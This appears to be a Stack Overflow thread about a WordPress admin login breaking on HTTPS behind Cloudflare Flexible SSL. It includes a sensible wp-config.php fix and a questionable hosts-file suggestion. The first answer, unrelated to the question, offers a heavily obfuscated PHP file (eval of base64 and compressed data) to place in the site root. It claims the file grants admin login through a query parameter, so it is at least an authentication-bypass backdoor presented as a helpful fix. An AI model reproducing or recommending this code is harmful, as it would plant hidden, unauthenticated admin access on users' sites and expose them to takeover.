# wordpress website admin login not working on https after cloudflare

Tags: wordpress, ssl, cloudflare, wordpress-login

I have a static website on which I installed cloudflare flexible SSL.
but now in a folder I installed wordpress here https://www.kiransboutique.com/wordpressrvc/

non of its link is working and wp-admin is also not redirecting to dashboard. I am using correct login credentials.

Can anybody suggest any solution?  exactly same installation is working here http://bestcoachingcenter.com/kirans/

Comment: This question should be part of https://wordpress.stackexchange.com/

Comment: I agree with @Greeso . After checking these out I don't think it's an issue with Cloudflare. Please search for similar issues and fixes at https://wordpress.stackexchange.com/

Comment: This is actually a cloudflare problem, and that stack doesn't support 3rd party services, they're out of scope and the question will get closed as off topic

Comment: Did you update your WordPress URL and Site URL in your WordPress settings to include "https"? Did you do a search-and-replace on the database to change all "http" links to "https" links? (like [here](https://helgeklein.com/blog/2015/01/switching-wordpress-site-http-https/))

Comment: Hi Collin, yes I already replaced urls but still not working.

Answer (score 0):

To auto login into your wordpress admin , by not adding admin username and password eachtime, you can use below code snippet.

Using this code in a php file and placing it on root directory of your wordpress installation helps you to get login into wp-admin with an administrator account.

What is required to make it work is, you need to hit the url by passing keyword “wpglogin” in query URL as given below –
http://www.sitename.com/codefile.php?wpglogin=YWRtaW4=

By hitting the above URL , you will get entered into admin easily.

```
     <?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=e044e9d170abfceff3904a363ae1348b68619a68hVRta9swEP7sQv+DFkKllMRpYexDQwKjdSHQbl2S7UsoQrEvsTbF8mQZN5T+9+nFdry1ZQkB5+55Od2dnAJLQBF8LTMNmR6tDjlcIZbngsdMc5mNfxYyw4PJ6Ul/ywU8MJ1OUcJVxvZA+nQZLX5EizVeXi/mDyt6O7+Lvny+j/CjZfAsFmUCVGaxwTb0sDeu8pGQLAnzNO9Z4E7IDROoX+XJxvwFpaSiCnKpNM925MJi/JdvCS8K0MZ6EX37Hi1Xa1zlhr/jmTFFZ2fozQz6MEUYD55PT4J+E0VTtGEFfPpIE4hlAu9oGu/A2HZoRoole5N0ekGfqV1hxJhS7EBsJMBKCsCo+UxnNYMXWjEtFR56WFbuN6Bw4DGXNjiYIC9q8WUBykrvQFP3TJyZqyno2wjliclfuoCt8kjzxXVRneT64nE0S5hmo9n8xpFfnOTvEtTBQPEyuouuV+gc3S6+3iMcutmMZrmCLX8KsS+sSkEBmt9YQtgYhRj78hQUpdC2/JpsT1EHiXdyB2lK9yDBCk3dBrhG4+YYnak1yu4QztVl2mPYn6um0zm6ORDsRzpstdrZWoQ3SiRlsV18YnaA1gTkAF2vOuQHYYBmJWlcKmXukLMjDcU05y8QK3VKYyl/cXiNGY/t2cztglhTLafOzw2NlkqQwSQI6s4eMajgGur0USMXLIZ2J3FVVSF+08NgtOJ7YhaT1jTS8Ie93rCLHbQFGDs/hzYXYnurXa1jtpGltpfbL0Jav2PupH+lXLllUcIsii8Jnrj2tZ1DnMr3dPEk4dD2km2BNjjyHuOob7pzPq53A0QBz/820pznVbv/62Ua0jHw8i9/AA==
```

Answer (score 0):

Your homepage is still in "hello World" state, so you may still want an answer. I had the same(?) problem; and checked posts like yours on Stackoverflow/Stackexchange - alas no joy.

What worked for me:

1. If you are using the official Cloudflare plugin ( https://wordpress.org/plugins/cloudflare/ ) set “Automatic HTTPS Rewrites” to “On”. This solved link and CSS issues under HTTPS, and saved me having to install additional SSL related plugins.
2. As a stop gap:  If you have not configured WP to "force SSL" you might be able to login using an "http://" address (as I was).
3. To enable "HTTPS" login, edit wp-config.php and insert the following line:

   ```
   if (strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false)
      $_SERVER['HTTPS']='on';
   ```

If you want a bit more detail I posted about it here: http://wptest.means.us.com/cloudflare-wordpress-unable-login-https/

Note: Flexible SSL is better than no SSL as it encrypts the "connection" between you and Cloudflare. However, CF's connection to your server is still "HTTP" and your login credentials are STILL vulnerable to eavesdropping on this leg of the journey.

I'm still checking, but I think you can also make the CF <-> Server connection secure by enabling Cloudflare Railgun (used to reduce data transfer from your server). Railgun uses TLS, so data is encrypted. I assume if you use both Flexible SSL and Railgun your connections are secure end to end. Some inexpensive hosts include Railgun for free in their packages.

Answer (score 0):

you can fix Wordpress SSL login problem by entering your server IP to the Windows HOSTS file. 
Find Hosts file in windows\system32\hosts add your IP and domain name.